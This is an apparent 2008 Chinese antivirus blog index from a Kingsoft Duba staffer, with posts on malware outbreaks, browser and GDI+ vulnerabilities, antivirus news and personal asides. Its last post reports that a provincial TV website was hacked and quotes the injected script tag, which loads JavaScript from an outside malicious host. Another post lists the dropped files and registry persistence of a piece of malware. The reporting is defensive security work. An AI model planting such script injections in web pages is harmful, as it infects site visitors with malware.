铁军的杀毒圈子

文章列表

2008-10-12 09:22

中招后的机器联网的情况下会下载很多小木马，有的可被杀毒软件查获，下载器不断的下载病毒。与此同时杀毒软件不断的清除病毒，你会发现系统速度非常慢。

同时，病毒会破坏安全模式，关闭与杀毒软件相关的网页，当资源管理器的窗口出现冰刃或其它手动杀毒相关工具的关键字时，资源管理器窗口也会被关闭，注册表编辑器和任务管理器均无法正常使用。此时如果尝试安装杀毒软件，是不会成功的，因杀毒软件相关的进程也会被病毒尝试终止。

AV终结者专杀会发现许多映像劫持的信息，使用AV终结者专杀无法彻底解决。

阅读全文>>

类别：杀毒防毒 | 评论(5) | 浏览()

毒霸开发组提供的Clickjacking漏洞相关资料

2008-10-10 10:07

一、Clickjacking相关资料

1、影响范围：所有主流的桌面平台，包括IE、Firefox、Safari、Opera以及Adobe Flash。

2、攻击原理：

时至9月底，今年继GDI＋图片漏洞之后，又一影响更为深远的攻击漏洞Clickjacking被揭露。通过此漏洞，攻击者可以控制用户的浏览器，在用户毫不知情的情况下点击任意链接、任意按钮或者网上任意的东西。

3、相关的情景假设：

（1）当你访问一个恶意网站的时候，攻击者可以控制你的浏览器对一些链接的访问，这个漏洞影响

阅读全文>>

类别：安全公告 | 评论(11) | 浏览()

10.1前的杀毒大赛论坛会员贡献了很多好文章

2008-10-08 11:38

看我杀毒36计——杀毒大赛优秀文章导读

杀毒大赛优秀文章导读（排名不分先后）

如果还有参赛者的文章未能列出，请直接PM我，或者邮件到litiejun@kingsoft.com

论坛管理组会对每篇文章写出简单的点评，当然文章好不好，最终要看网友的意见。杀毒大赛优秀文章导读（排名不分先后）

论坛管理组会对每篇文章写出简单的点评，当

阅读全文>>

类别：杀毒防毒 | 评论(8) | 浏览()

一个煞费心机的病毒伪装

2008-10-07 14:15

看华南虎发来的病毒播报，注意到其中有这样一个病毒：“欺骗者捆绑器2060299”（PE.VBIconchgs.il.2060299）

大百科中的分析描述如下：

病毒名称(中文):欺骗者捆绑器2060299
威胁级别:★★☆☆☆
病毒类型:文件捆绑器
病毒长度:2060299
影响系统:Win9x WinMe WinNT Win2000 WinXP Win2003

病毒行为:

这是一个由VB语言所写的感染型捆绑器程序。它能够将病毒程序捆绑到正常的文件上，进入电脑后就释放出病毒。它所携

阅读全文>>

类别：杀毒防毒 | 评论(3) | 浏览()

长假后开工第一天

2008-10-06 21:50

攒的邮件，论坛短消息都成灾了，当了7天宅男，今天上班发现几个回家的同事没来，传说是没买到票。

长假看来是家人团聚的日子，全国人民都在这7天去旅行，怎么受得了，还是当宅男最环保。

类别：默认分类 | 评论(10) | 浏览()

那一刻全论坛的网友都去看航天员出舱了

2008-09-28 17:04

9月27日16点43分24秒，翟志刚开始出舱进入太空。16点45分17秒，翟志刚在太空迈出第一步，中国人的第一次太空行走开始了。

回顾昨天这个时刻，bbs.duba.net的在线人曲线

那个时刻，我也在网上看直播。今天5点，飞船返回，相信也是这样类似的访问曲线。

类别：默认分类 | 评论(6) | 浏览()

网镖最新更新添加了安全认证是否放行的开关

2008-09-27 15:07

网镖最新更新添加了安全认证是否放行的开关

网镖在前几次的更新中，应用了互联网安全认证的成果，默认会将安全认证判断为安全的项自动放行。

这个更改对大多数用户来说，是个不错的选择，因多数用户并不是十分精通系统安全，让用户作出选择是困难的。让程序帮

阅读全文>>

类别：杀毒防毒 | 评论(6) | 浏览()

毒霸再次通过VB100认证

2008-09-27 10:59

VB100官方公告链接（需注册后查阅）
http://www.virusbtn.com/vb100/archive/2008/10.xml

这次检测的平台是windows server 2008

类别：安全公告 | 评论(11) | 浏览()

祝贺三鹿死翘翘

2008-09-27 09:50

三鹿大厦将倾，传说三元即将接盘。农民倒奶杀牛事件不会立即停止，消费者的信心也不会随着三鹿的突然死亡而恢复，中国乳制品行业终将陷入1-2年的低谷。损失最严重的，恐怕是产业链最底层的奶农，政府的救助很可能无法阻止杀牛倒奶的凄凉。

这其实不是乳制品行业的悲哀，死去的“三鹿”成为不良企业的一杆旗帜。你不是藐视消费者吗？早晚你会消费者毫不犹豫的抛弃，不要以为消费者是傻子。

类别：胡说九道 | 评论(17) | 浏览()

神7顺利飞天

2008-09-25 21:32

这次总算看到直播了，很紧张，希望接下来的飞行一切顺利。

酒泉卫星发射基地用的是金山毒霸网络版

类别：杀毒防毒 | 评论(14) | 浏览()

HBKernel系列恶性病毒专杀工具由爱毒霸社区发布

2008-09-24 21:33

因该病毒通常不是孤立存在的，在使用本专杀工具解决HBKernel系列之后，还需要使用AV终结者或清理专家在解决其它病毒。

详细信息请参考：

http://bbs.duba.net/thread-21978027-1-1.html

专杀工具下载地址：
http://bbs.duba.net/attachment.php?aid=16215974

类别：杀毒防毒 | 评论(6) | 浏览()

贴吧里好多NORTON的小枪

2008-09-24 15:11

千篇一律的回复偶现在用得是诺顿那款产品，从未中过毒，不妨试一下幺。听同事说诺顿又要有新产品上市了，诺顿09版对电脑系统没有任何负担，安装和御卸的速度还很快……期待…… ID不停的换，不知几分一贴。

类别：杀毒八卦 | 评论(7) | 浏览()

HBKernel系列恶性病毒频发

2008-09-23 22:22

该病毒会下载系列盗号木马，典型的表现是清理专家会检测到大量DLL文件注入。

典型的日志分析可参考论坛的帖子
http://bbs.duba.net/thread-21977174-1-1.html

原病毒运行后释放HB***.dll,system.exe到%sys32dir%下，释放HBKernel32.sys到%sys32dir%\drivers下

检测：
system.exe启动项：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HBService32；

阅读全文>>

类别：杀毒防毒 | 评论(1) | 浏览()

GDI+漏洞专补工具发布测试

2008-09-19 11:52

9月10日，微软在当月的安全公告中公布了GDI+漏洞，指出该漏洞为高风险，并已经提供补丁程序下载。

详细信息，可参考微软官方关于GDI+漏洞的说明

金山清理专家次日更新了漏洞库为毒霸客户提供了对应方案。

目前，尚未确认互联网出现针对此漏洞的攻击代码，金山反病毒中心会密切监视。

由于GDI+组件应用很广泛，风险可能涉及多个与图片应用相关的应用软件，毒霸也发布了单独的漏洞修补工具。下图是在我的电脑上扫描的结果。由于gdiplus.

阅读全文>>

类别：安全公告 | 评论(8) | 浏览()

吉林电视网被挂马

2008-09-19 09:39

http://www.jilintv.cn/

省电视台啊

头部被加入

<script language=javascript src=http://nobb.w5.adminxx.com.cn/new/new.js></script>

类别：安全公告 | 评论(2) | 浏览()